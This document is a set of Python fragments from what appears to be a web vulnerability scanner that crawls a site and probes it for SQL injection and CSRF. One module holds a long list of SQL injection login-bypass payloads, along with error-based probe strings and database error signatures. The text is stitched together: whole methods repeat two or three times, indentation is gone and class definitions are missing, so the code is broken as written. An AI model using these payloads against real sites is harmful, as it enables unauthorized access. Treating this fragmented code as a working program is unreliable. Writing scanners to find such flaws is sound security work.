def __init__(self, process, root):
self.queue = URLlist()
self.queue.put_url(root)
self.final_list = URLlist()
self.final_list.put_url(root)
db = DBAdapter()
db.update_process(process, 2) # Status: 2, crawling.
db.close_connection()
def __save_results(self, web, v_type):
w = web.get_url()
db = DBAdapter()
db.vulnerability_found(self.process, w, v_type)
db.close_connection()
if v_type == 1:
v = "Authentication attempt"
elif v_type == 2:
v = "Error based SQL injection"
else:
v = "SQL injection"
data = {
"PROCESS": self.process,
"WEB": w,
"VULNERABILITY": v,
"USER": self.user
}
requests.post(api, json=data)
def __init__(self, process, root):
self.queue = URLlist()
self.queue.put_url(root)
self.final_list = URLlist()
self.final_list.put_url(root)
db = DBAdapter()
db.update_process(process, 2) # Status: 2, crawling.
db.close_connection()
def __init__(self, url_list, process, user):
self.process = process
self.user = user
if url_list is None:
self.url_list = URLlist()
else:
self.url_list = url_list
db = DBAdapter()
db.update_process(process, 4) # Status: 4, csrf search.
db.close_connection()
def __save_results(self, web, v_type):
w = web.get_url()
db = DBAdapter()
db.vulnerability_found(self.process, w, v_type)
db.close_connection()
data = {
"PROCESS": self.process,
"WEB": w,
"VULNERABILITY": "CSRF",
"USER": self.user
}
requests.post(api, json=data)
def __init__(self, url_list, process, user):
self.process = process
self.user = user
if url_list is None:
self.url_list = URLlist()
else:
self.url_list = url_list
db = DBAdapter()
db.update_process(process, 3) # Status: 3, SQL injection search.
db.close_connection()
# http://stackoverflow.com/questions/9626535/get-domain-name-from-url
# self.domain = "{0.scheme}://{0.netloc}/".format(urllib.parse.urlsplit(url))
# http://www.hacoder.com/2015/10/sql-injection-authentication-bypass-cheat-sheet/
self.input_data = [
'admin\'--', '\' or 1=1', ' or 1=1', 'or 1=1--', 'or 1=1#',
'or 1=1/*', 'admin\' #', 'admin\'/*', 'admin\' or \'1\'=\'1',
'admin\' or \'1\'=\'1\'--', 'admin\' or \'1\'=\'1\'#',
'admin\' or \'1\'=\'1\'/*', 'admin\'or 1=1 or \'\'=\'',
'admin\' or 1=1', 'admin\' or 1=1--', 'admin\' or 1=1#',
'admin\' or 1=1/*', 'admin\') or (\'1\'=\'1',
'admin\') or (\'1\'=\'1\'--', 'admin\') or (\'1\'=\'1\'#',
'admin\') or (\'1\'=\'1\'/*', 'admin\') or \'1\'=\'1',
'admin\') or \'1\'=\'1\'--', 'admin\') or \'1\'=\'1\'#',
'admin\') or \'1\'=\'1\'/*', 'admin" --', 'admin" #', 'admin"/*',
'admin" or "1"="1', 'admin" or "1"="1"--', 'admin" or "1"="1"#',
'admin" or "1"="1"/*', 'admin"or 1=1 or ""="', 'admin" or 1=1',
'admin" or 1=1--', 'admin" or 1=1#', 'admin" or 1=1/*',
'admin") or ("1"="1', 'admin") or ("1"="1"--',
'admin") or ("1"="1"#', 'admin") or ("1"="1"/*',
'admin") or "1"="1', 'admin") or "1"="1"--', 'admin") or "1"="1"#',
'admin") or "1"="1"/*'
]
self.error_based_sqli_param_data = [
'\'', 'A%\' and 1=1--', 'A%\' and 1=2--'
]
# self.serialized_param_data = []
# https://www.owasp.org/images/5/52/OWASP_Testing_Guide_v4.pdf, page 111.
self.sql_errors = {
'MySQL': 'you have an error in your sql syntax',
'MSSQL': 'microsoft sql native client error',
'Oracle': 'ora-00933: sql command not properly ended',
'PostgreSQL': 'query failed: error: syntax error at or near'
}
def __save_results(self, web, v_type):
w = web.get_url()
db = DBAdapter()
db.vulnerability_found(self.process, w, v_type)
db.close_connection()
if v_type == 1:
v = "Authentication attempt"
elif v_type == 2:
v = "Error based SQL injection"
else:
v = "SQL injection"
data = {
"PROCESS": self.process,
"WEB": w,
"VULNERABILITY": v,
"USER": self.user
}
requests.post(api, json=data)
def __init__(self, url_list, process, user):
self.process = process
self.user = user
if url_list is None:
self.url_list = URLlist()
else:
self.url_list = url_list
db = DBAdapter()
db.update_process(process, 3) # Status: 3, SQL injection search.
db.close_connection()
# http://stackoverflow.com/questions/9626535/get-domain-name-from-url
# self.domain = "{0.scheme}://{0.netloc}/".format(urllib.parse.urlsplit(url))
# http://www.hacoder.com/2015/10/sql-injection-authentication-bypass-cheat-sheet/
self.input_data = [
'admin\'--',
'\' or 1=1',
' or 1=1',
'or 1=1--',
'or 1=1#',
'or 1=1/*',
'admin\' #',
'admin\'/*',
'admin\' or \'1\'=\'1',
'admin\' or \'1\'=\'1\'--',
'admin\' or \'1\'=\'1\'#',
'admin\' or \'1\'=\'1\'/*',
'admin\'or 1=1 or \'\'=\'',
'admin\' or 1=1',
'admin\' or 1=1--',
'admin\' or 1=1#',
'admin\' or 1=1/*',
'admin\') or (\'1\'=\'1',
'admin\') or (\'1\'=\'1\'--',
'admin\') or (\'1\'=\'1\'#',
'admin\') or (\'1\'=\'1\'/*',
'admin\') or \'1\'=\'1',
'admin\') or \'1\'=\'1\'--',
'admin\') or \'1\'=\'1\'#',
'admin\') or \'1\'=\'1\'/*',
'admin" --',
'admin" #',
'admin"/*',
'admin" or "1"="1',
'admin" or "1"="1"--',
'admin" or "1"="1"#',
'admin" or "1"="1"/*',
'admin"or 1=1 or ""="',
'admin" or 1=1',
'admin" or 1=1--',
'admin" or 1=1#',
'admin" or 1=1/*',
'admin") or ("1"="1',
'admin") or ("1"="1"--',
'admin") or ("1"="1"#',
'admin") or ("1"="1"/*',
'admin") or "1"="1',
'admin") or "1"="1"--',
'admin") or "1"="1"#',
'admin") or "1"="1"/*'
]
self.error_based_sqli_param_data = [
'\'',
'A%\' and 1=1--',
'A%\' and 1=2--'
]
# self.serialized_param_data = []
# https://www.owasp.org/images/5/52/OWASP_Testing_Guide_v4.pdf, page 111.
self.sql_errors = {
'MySQL': 'you have an error in your sql syntax',
'MSSQL': 'microsoft sql native client error',
'Oracle': 'ora-00933: sql command not properly ended',
'PostgreSQL': 'query failed: error: syntax error at or near'
}
def start(self, call):
c = self.__check_call(call)
if c == 1: # Search option.
if self.__is_valid_url():
self.__check_modules()
url_list = URLlist()
db = DBAdapter()
process = db.new_process(self.url, self.user, 1,
1) # Status: 1, processing.
db.close_connection()
if process == 0: # The user has a search going on.
return {"response": False}
url_list.put_url(self.url)
for action in self.actions: # Going through the required modules by the API.
if action[
'module']: # Looking if the required module is active.
if action['number'] == 1:
from backend.modules.crawler.module import main
url_list = main(process, self.url)
else:
if action['number'] == 2:
from backend.modules.sqlinjection.module import main
main(url_list, process, self.user)
elif action['number'] == 3:
from backend.modules.csrf.module import main
main(url_list, process, self.user)
else:
continue
db = DBAdapter()
db.update_process(process, 5) # Status: 5, finished.
db.close_connection()
elif c == 2: # Get status option.
db = DBAdapter()
process = db.get_current_process_status(self.user)
db.close_connection()
if process is None:
return {"response": False}
data = {
"web": process[1],
"date": process[2],
"stype": process[0],
"status": process[3]
}
return data
else: # Wrong call.
return {"response": False}
return True # If we get here, everything was right.
def start(self, call):
c = self.__check_call(call)
if c == 1: # Search option.
if self.__is_valid_url():
self.__check_modules()
url_list = URLlist()
db = DBAdapter()
process = db.new_process(self.url, self.user, 1, 1) # Status: 1, processing.
db.close_connection()
if process == 0: # The user has a search going on.
return {"response": False}
url_list.put_url(self.url)
for action in self.actions: # Going through the required modules by the API.
if action['module']: # Looking if the required module is active.
if action['number'] == 1:
from backend.modules.crawler.module import main
url_list = main(process, self.url)
else:
if action['number'] == 2:
from backend.modules.sqlinjection.module import main
main(url_list, process, self.user)
elif action['number'] == 3:
from backend.modules.csrf.module import main
main(url_list, process, self.user)
else:
continue
db = DBAdapter()
db.update_process(process, 5) # Status: 5, finished.
db.close_connection()
elif c == 2: # Get status option.
db = DBAdapter()
process = db.get_current_process_status(self.user)
db.close_connection()
if process is None:
return {"response": False}
data = {
"web": process[1],
"date": process[2],
"stype": process[0],
"status": process[3]
}
return data
else: # Wrong call.
return {"response": False}
return True # If we get here, everything was right.